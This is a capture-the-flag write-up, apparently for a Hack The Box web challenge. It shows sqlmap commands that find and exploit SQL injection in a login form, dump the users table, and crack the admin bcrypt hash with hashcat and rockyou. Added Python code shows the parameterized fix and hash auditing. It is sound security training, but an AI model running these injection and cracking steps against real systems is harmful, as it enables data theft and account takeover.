# KORP Terminal

**Category:** Web\
**Difficulty:** very-easy\
**Flag:** HTB{t3rm1n4l\_cr4ck1ng\_sh3n4nig4n5}

## Challenge

{% hint style="info" %}

#### Description

***

Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
{% endhint %}

{% hint style="warning" %}
This challenge runs in a Docker container, available on [Github](https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BVery%20Easy%5D%20KORP%20Terminal)
{% endhint %}

## Site analysis

The site consists of a single form, submitted via POST with the parameters **`username`** and **`password`**. We can run sqlmap against it to see whether an injection is detected.

<figure><img src="/files/7GHfu6VSiqplHFriJ9PG" alt=""><figcaption></figcaption></figure>

```
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username,password" --method POST --ignore-code 401 --batch

[...]
[22:26:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[22:26:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[22:26:15] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[22:26:16] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[22:26:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[22:26:19] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'username' is vulnerable.
```
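As an added illustration that is not part of the challenge's code, here is the kind of login lookup that produces this sqlmap finding, next to its parameterized fix. The in-memory SQLite table stands in for `korp_terminal.users` and its column layout is assumed; the stored hash is the one dumped later in this write-up.

```python
import sqlite3

# Constructed stand-in for korp_terminal.users (schema assumed, not the challenge's own).
ADMIN_HASH = "$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv."


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, password TEXT, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, ?, 'admin')", (ADMIN_HASH,))
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    # The defect sqlmap reports on the 'username' parameter: user input is
    # spliced into the SQL text, so a quote in the input becomes SQL syntax.
    query = f"SELECT id, password FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchone()


def lookup_safe(conn, username):
    # Hardened form: the driver sends the value separately from the statement,
    # so whatever the input contains is compared as a literal string.
    query = "SELECT id, password FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchone()


def quote_probe(conn):
    """Feed both lookups a value containing an apostrophe.

    Returns (vulnerable_raised_error, safe_handled_it). A legitimate-looking
    name such as O'Brien is enough to break the concatenated query, which is
    the same syntax-error signal sqlmap keys on during detection.
    """
    probe = "O'Brien"
    try:
        lookup_vulnerable(conn, probe)
        vuln_err = False
    except sqlite3.OperationalError:
        vuln_err = True
    safe_ok = lookup_safe(conn, probe) is None  # no such user, no error
    return vuln_err, safe_ok


if __name__ == "__main__":
    db = make_db()
    print("vulnerable raised / safe handled:", quote_probe(db))
    print("safe lookup of admin:", lookup_safe(db, "admin"))
```

On a real deployment the database syntax error from the vulnerable path is also what to alert on in the application logs, since it appears long before any data is extracted.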

***

## Exploiting the SQL injection

The **`username`** parameter is vulnerable, so we can try to dump the database.

```
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 --dbs --batch

available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test
```

There we find the **`korp_terminal`** database.

```
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal --tables --batch

Database: korp_terminal
[1 table]
+-------+
| users |
+-------+
```

It consists of a single table: **`users`**

```
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal -T users --dump --batch

Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password                                                     | username |
+----+--------------------------------------------------------------+----------+
| 1  | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin    |
+----+--------------------------------------------------------------+----------+
```

It contains one account: **`admin`**

The password is clearly hashed. Even though we recognise bcrypt, we will run it through **hashcat** to identify it with certainty, then take the opportunity to try to crack it.

***

## Cracking the hash

First we save the password hash to a file, here named **`hashes.txt`**

I use the **`rockyou.txt`** wordlist to try to crack it

```
$ hashcat hashes.txt

The following 4 hash-modes match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
```

We were not mistaken, it really is **bcrypt**; on to the brute force.
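hashcat recognises the hash purely from its layout, and the same check is useful on the defending side to audit what a dumped credential table actually stores. As an added example (not from the write-up or from hashcat), this parser splits the admin hash into the fields bcrypt's modular crypt format defines; the minimum-cost threshold is an assumption for illustration.

```python
import re

# bcrypt modular crypt format: $<variant>$<cost>$<22-char salt><31-char digest>
# using bcrypt's own base64 alphabet (./A-Za-z0-9). 7 + 53 = 60 characters.
_BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{53})$")

# The hash dumped from korp_terminal.users in this write-up.
ADMIN_HASH = "$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv."


def parse_bcrypt(h):
    """Split a bcrypt string into its fields; raise ValueError if malformed."""
    m = _BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash (structure mismatch)")
    variant, cost, body = m.group(1), int(m.group(2)), m.group(3)
    if not 4 <= cost <= 31:
        raise ValueError(f"cost {cost} outside bcrypt's 4..31 range")
    return {
        "variant": variant,          # 2, 2a, 2b, 2x or 2y
        "cost": cost,                # work factor; key setup runs 2**cost times
        "rounds": 2 ** cost,
        "salt": body[:22],           # 128-bit salt, 22 base64 chars
        "digest": body[22:],         # 184-bit digest, 31 base64 chars
        "hashcat_mode": 3200,        # plain bcrypt, as hashcat listed above
    }


def needs_rehash(h, min_cost=12):
    """True when the stored hash uses a lower work factor than policy (assumed: 12)."""
    return parse_bcrypt(h)["cost"] < min_cost


if __name__ == "__main__":
    info = parse_bcrypt(ADMIN_HASH)
    for k, v in info.items():
        print(f"{k:13}: {v}")
    print("needs rehash:", needs_rehash(ADMIN_HASH))
```

Cost 12 is adequate against a full keyspace search, yet the hash still falls in seconds below because `password123` sits in rockyou; the work factor only multiplies the cost per guess, it does not rescue a password that is on every wordlist.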

```
$ hashcat hashes.txt -m 3200 rockyou.txt

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Dictionary cache built:
* Filename..: ../rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
```

And there we have it, our password: **`password123`**

***

## Retrieving the flag

We can now log in with **`admin:password123`**

<figure><img src="/files/y8UrVWiZ4EnbbnrcC1sn" alt=""><figcaption></figcaption></figure>
